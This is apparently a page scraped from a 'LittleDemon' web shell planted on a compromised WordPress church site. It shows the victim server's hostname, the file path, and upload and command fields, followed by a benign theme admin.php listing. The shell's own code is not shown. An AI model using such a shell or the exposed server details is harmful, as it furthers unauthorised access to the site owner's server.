LittleDemon WebShell


Linux webm007.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Path : /home/eglisebaa/www/wp-content/themes/hallelujah/includes/
File Upload :
Command :
Current File : /home/eglisebaa/www/wp-content/themes/hallelujah/includes/admin.php

<?php
/**
 * Admin utilities
 *
 * @package WordPress
 * @subpackage HALLELUJAH
 * @since HALLELUJAH 1.0.1
 */

// Disable direct call
if ( ! defined( 'ABSPATH' ) ) {
	exit; }


//-------------------------------------------------------
//-- Theme init
//-------------------------------------------------------

// Theme init priorities:
// 1 - register filters to add/remove lists items in the Theme Options
// 2 - create Theme Options
// 3 - add/remove Theme Options elements
// 5 - load Theme Options
// 9 - register other filters (for installer, etc.)
//10 - standard Theme init procedures (not ordered)

if ( ! function_exists( 'hallelujah_admin_theme_setup' ) ) {
	add_action( 'after_setup_theme', 'hallelujah_admin_theme_setup' );
	function hallelujah_admin_theme_setup() {
		// Add theme icons
		add_action( 'admin_footer', 'hallelujah_admin_footer' );

		// Enqueue scripts and styles for admin
		add_action( 'admin_enqueue_scripts', 'hallelujah_admin_scripts' );
		add_action( 'admin_footer', 'hallelujah_admin_localize_scripts' );

		// Show admin notice with control panel
		add_action( 'admin_notices', 'hallelujah_admin_notice' );
		add_action( 'wp_ajax_hallelujah_hide_admin_notice', 'hallelujah_callback_hide_admin_notice' );

		// Show admin notice with "Rate Us" panel
		add_action( 'after_switch_theme', 'hallelujah_save_activation_date' );
		add_action( 'admin_notices', 'hallelujah_rate_notice' );
		add_action( 'wp_ajax_hallelujah_hide_rate_notice', 'hallelujah_callback_hide_rate_notice' );

		// TGM Activation plugin
		add_action( 'tgmpa_register', 'hallelujah_register_plugins' );

		// Init internal admin messages
		hallelujah_init_admin_messages();
	}
}


//-------------------------------------------------------
//-- Welcome notice
//-------------------------------------------------------

// Show admin notice
if ( ! function_exists( 'hallelujah_admin_notice' ) ) {
	//Handler of the add_action('admin_notices', 'hallelujah_admin_notice');
	function hallelujah_admin_notice() {
		if ( hallelujah_exists_trx_addons()
			|| in_array( hallelujah_get_value_gp( 'action' ), array( 'vc_load_template_preview' ) )
			|| hallelujah_get_value_gp( 'page' ) == 'hallelujah_about'
			|| ! current_user_can( 'edit_theme_options' ) ) {
			return;
		}
		$show = get_option( 'hallelujah_admin_notice' );
		if ( false !== $show && 0 == (int) $show ) {
			return;
		}
		get_template_part( apply_filters( 'hallelujah_filter_get_template_part', 'templates/admin-notice' ) );
	}
}

// Hide admin notice
if ( ! function_exists( 'hallelujah_callback_hide_admin_notice' ) ) {
	//Handler of the add_action('wp_ajax_hallelujah_hide_admin_notice', 'hallelujah_callback_hide_admin_notice');
	function hallelujah_callback_hide_admin_notice() {
		if ( wp_verify_nonce( hallelujah_get_value_gp( 'nonce' ), admin_url( 'admin-ajax.php' ) ) ) {
			update_option( 'hallelujah_admin_notice', '0' );
		}
		wp_die();
	}
}


//-------------------------------------------------------
//-- "Rate Us" notice
//-------------------------------------------------------

// Save activation date
if ( ! function_exists( 'hallelujah_save_activation_date' ) ) {
	//Handler of the add_action('after_switch_theme', 'hallelujah_save_activation_date');
	function hallelujah_save_activation_date() {
		$theme_time = (int) get_option( 'hallelujah_theme_activated' );
		if ( 0 == $theme_time ) {
			$theme_slug      = get_option( 'template' );
			$stylesheet_slug = get_option( 'stylesheet' );
			if ( $theme_slug == $stylesheet_slug ) {
				update_option( 'hallelujah_theme_activated', time() );
			}
		}
	}
}

// Show Rate Us notice
if ( ! function_exists( 'hallelujah_rate_notice' ) ) {
	//Handler of the add_action('admin_notices', 'hallelujah_rate_notice');
	function hallelujah_rate_notice() {
		if ( in_array( hallelujah_get_value_gp( 'action' ), array( 'vc_load_template_preview' ) ) ) {
			return;
		}
		if ( ! current_user_can( 'edit_theme_options' ) ) {
			return;
		}
		// Display the message only on specified screens
		$allowed = array( 'dashboard', 'theme_options', 'trx_addons_options' );
		$screen  = function_exists( 'get_current_screen' ) ? get_current_screen() : false;
		if ( ( is_object( $screen ) && ! empty( $screen->id ) && in_array( $screen->id, $allowed ) ) || in_array( hallelujah_get_value_gp( 'page' ), $allowed ) ) {
			$show  = get_option( 'hallelujah_rate_notice' );
			$start = get_option( 'hallelujah_theme_activated' );
			if ( ( false !== $show && 0 == (int) $show ) || ( $start > 0 && ( time() - $start ) / ( 24 * 3600 ) < 14 ) ) {
				return;
			}
			get_template_part( apply_filters( 'hallelujah_filter_get_template_part', 'templates/admin-rate' ) );
		}
	}
}

// Hide rate notice
if ( ! function_exists( 'hallelujah_callback_hide_rate_notice' ) ) {
	//Handler of the add_action('wp_ajax_hallelujah_hide_rate_notice', 'hallelujah_callback_hide_rate_notice');
	function hallelujah_callback_hide_rate_notice() {
		if ( wp_verify_nonce( hallelujah_get_value_gp( 'nonce' ), admin_url( 'admin-ajax.php' ) ) ) {
			update_option( 'hallelujah_rate_notice', '0' );
		}
		wp_die();
	}
}


//-------------------------------------------------------
//-- Internal messages
//-------------------------------------------------------

// Init internal admin messages
if ( ! function_exists( 'hallelujah_init_admin_messages' ) ) {
	function hallelujah_init_admin_messages() {
		$msg = get_option( 'hallelujah_admin_messages' );
		if ( is_array( $msg ) ) {
			update_option( 'hallelujah_admin_messages', '' );
		} else {
			$msg = array();
		}
		hallelujah_storage_set( 'admin_messages', $msg );
	}
}

// Add internal admin message
if ( ! function_exists( 'hallelujah_add_admin_message' ) ) {
	function hallelujah_add_admin_message( $text, $type = 'success', $cur_session = false ) {
		if ( ! empty( $text ) ) {
			$new_msg = array(
				'message' => $text,
				'type'    => $type,
			);
			if ( $cur_session ) {
				hallelujah_storage_push_array( 'admin_messages', '', $new_msg );
			} else {
				$msg = get_option( 'hallelujah_admin_messages' );
				if ( ! is_array( $msg ) ) {
					$msg = array();
				}
				$msg[] = $new_msg;
				update_option( 'hallelujah_admin_messages', $msg );
			}
		}
	}
}

// Show internal admin messages
if ( ! function_exists( 'hallelujah_show_admin_messages' ) ) {
	function hallelujah_show_admin_messages() {
		$msg = hallelujah_storage_get( 'admin_messages' );
		if ( ! is_array( $msg ) || count( $msg ) == 0 ) {
			return;
		}
		?>
		<div class="hallelujah_admin_messages">
			<?php
			foreach ( $msg as $m ) {
				?>
				<div class="hallelujah_admin_message_item <?php echo esc_attr( str_replace( 'success', 'updated', $m['type'] ) ); ?>">
					<p><?php echo wp_kses_data( $m['message'] ); ?></p>
				</div>
				<?php
			}
			?>
		</div>
		<?php
	}
}


//-------------------------------------------------------
//-- Styles and scripts
//-------------------------------------------------------

// Load inline styles
if ( ! function_exists( 'hallelujah_admin_footer' ) ) {
	//Handler of the add_action('admin_footer', 'hallelujah_admin_footer');
	function hallelujah_admin_footer() {
		// Get current screen
		$screen = function_exists( 'get_current_screen' ) ? get_current_screen() : false;
		if ( is_object( $screen ) && 'nav-menus' == $screen->id ) {
			hallelujah_show_layout(
				hallelujah_show_custom_field(
					'hallelujah_icons_popup',
					array(
						'type'   => 'icons',
						'style'  => hallelujah_get_theme_setting( 'icons_type' ),
						'button' => false,
						'icons'  => true,
					),
					null
				)
			);
		}
	}
}

// Load required styles and scripts for admin mode
if ( ! function_exists( 'hallelujah_admin_scripts' ) ) {
	//Handler of the add_action("admin_enqueue_scripts", 'hallelujah_admin_scripts');
	function hallelujah_admin_scripts( $all = false ) {

		// Add theme styles
		wp_enqueue_style( 'hallelujah-admin', hallelujah_get_file_url( 'css/admin.css' ), array(), null );

		// Links to selected fonts
		$screen = function_exists( 'get_current_screen' ) ? get_current_screen() : false;
		if ( $all || is_object( $screen ) ) {
			if ( $all || hallelujah_options_allow_override( ! empty( $screen->post_type ) ? $screen->post_type : $screen->id ) ) {
				// Load font icons
				wp_enqueue_style( 'hallelujah-icons', hallelujah_get_file_url( 'css/font-icons/css/fontello.css' ), array(), null );
				wp_enqueue_style( 'hallelujah-icons-animation', hallelujah_get_file_url( 'css/font-icons/css/animation.css' ), array(), null );
				// Load theme fonts
				$links = hallelujah_theme_fonts_links();
				if ( count( $links ) > 0 ) {
					foreach ( $links as $slug => $link ) {
						wp_enqueue_style( sprintf( 'hallelujah-font-%s', $slug ), $link, array(), null );
					}
				}
			} elseif ( apply_filters( 'hallelujah_filter_allow_theme_icons', is_customize_preview() || 'nav-menus' == $screen->id, ! empty( $screen->post_type ) ? $screen->post_type : $screen->id ) ) {
				// Load font icons
				wp_enqueue_style( 'hallelujah-icons', hallelujah_get_file_url( 'css/font-icons/css/fontello.css' ), array(), null );
			}
		}

		// Add theme scripts
		wp_enqueue_script( 'hallelujah-utils', hallelujah_get_file_url( 'js/theme-utils.js' ), array( 'jquery' ), null, true );
		wp_enqueue_script( 'hallelujah-admin', hallelujah_get_file_url( 'js/theme-admin.js' ), array( 'jquery' ), null, true );
	}
}

// Add variables in the admin mode
if ( ! function_exists( 'hallelujah_admin_localize_scripts' ) ) {
	//Handler of the add_action("admin_footer", 'hallelujah_admin_localize_scripts');
	function hallelujah_admin_localize_scripts() {
		$screen = function_exists( 'get_current_screen' ) ? get_current_screen() : false;
		wp_localize_script(
			'hallelujah-admin', 'HALLELUJAH_STORAGE', apply_filters(
				'hallelujah_filter_localize_script_admin', array(
					'admin_mode'                 => true,
					'screen_id'                  => is_object( $screen ) ? esc_attr( $screen->id ) : '',
					'user_logged_in'             => true,
					'ajax_url'                   => esc_url( admin_url( 'admin-ajax.php' ) ),
					'ajax_nonce'                 => esc_attr( wp_create_nonce( admin_url( 'admin-ajax.php' ) ) ),
					'msg_ajax_error'             => esc_html__( 'Server response error', 'hallelujah' ),
					'msg_icon_selector'          => esc_html__( 'Select the icon for this menu item', 'hallelujah' ),
					'msg_scheme_reset'           => esc_html__( 'Reset all changes of the current color scheme?', 'hallelujah' ),
					'msg_scheme_copy'            => esc_html__( 'Enter the name for a new color scheme', 'hallelujah' ),
					'msg_scheme_delete'          => esc_html__( 'Do you really want to delete the current color scheme?', 'hallelujah' ),
					'msg_scheme_delete_last'     => esc_html__( 'You cannot delete the last color scheme!', 'hallelujah' ),
					'msg_scheme_delete_internal' => esc_html__( 'You cannot delete the built-in color scheme!', 'hallelujah' ),
				)
			)
		);
	}
}



//-------------------------------------------------------
//-- Third party plugins
//-------------------------------------------------------

// Register optional plugins
if ( ! function_exists( 'hallelujah_register_plugins' ) ) {
	//Handler of the add_action('tgmpa_register', 'hallelujah_register_plugins');
	function hallelujah_register_plugins() {
		tgmpa(
			apply_filters(
				'hallelujah_filter_tgmpa_required_plugins', array(
				// Plugins to include in the autoinstall queue.
				)
			),
			array(
				'id'           => 'tgmpa',                 // Unique ID for hashing notices for multiple instances of TGMPA.
				'default_path' => '',                      // Default absolute path to bundled plugins.
				'menu'         => 'tgmpa-install-plugins', // Menu slug.
				'parent_slug'  => 'themes.php',            // Parent menu slug.
				'capability'   => 'edit_theme_options',    // Capability needed to view plugin install page, should be a capability associated with the parent menu used.
				'has_notices'  => true,                    // Show admin notices or not.
				'dismissable'  => true,                    // If false, a user cannot dismiss the nag message.
				'dismiss_msg'  => '',                      // If 'dismissable' is false, this message will be output at top of nag.
				'is_automatic' => false,                   // Automatically activate plugins after installation or not.
				'message'      => '',                      // Message to output right before the plugins table.
			)
		);
	}
}


// Return path to the plugin source
if ( ! function_exists( 'hallelujah_get_plugin_source_path' ) ) {
	function hallelujah_get_plugin_source_path( $path ) {
		$local = hallelujah_get_file_dir( $path );
		$path  = empty( $local ) && ! hallelujah_get_theme_setting( 'tgmpa_upload' ) ? hallelujah_get_plugin_source_url( $path ) : $local;
		return $path;
	}
}


// Return URL to the plugin download
if ( ! function_exists( 'hallelujah_get_plugin_source_url' ) ) {
	function hallelujah_get_plugin_source_url( $path ) {
		$code = hallelujah_get_theme_activation_code();
		$url  = '';
		if ( ! empty( $code ) ) {
			$theme = wp_get_theme();
			$url   = sprintf(
				trailingslashit( hallelujah_storage_get( 'theme_upgrade_url' ) ) . 'upgrade.php?key=%1$s&src=%2$s&theme_slug=%3$s&theme_name=%4$s&action=install_plugin&plugin=%5$s&rnd=%6$s',
				urlencode( $code ),
				urlencode( hallelujah_storage_get( 'theme_pro_key' ) ),
				urlencode( get_option( 'template' ) ),
				urlencode( $theme->name ),
				urlencode( str_replace( 'plugins/', '', $path ) ),
				mt_rand()
			);
		}
		return substr( $url, 0, 2 ) == '//' ? hallelujah_get_protocol() . ":{$url}" : $url;
	}
}

LittleDemon - FACEBOOK
[ KELUAR ]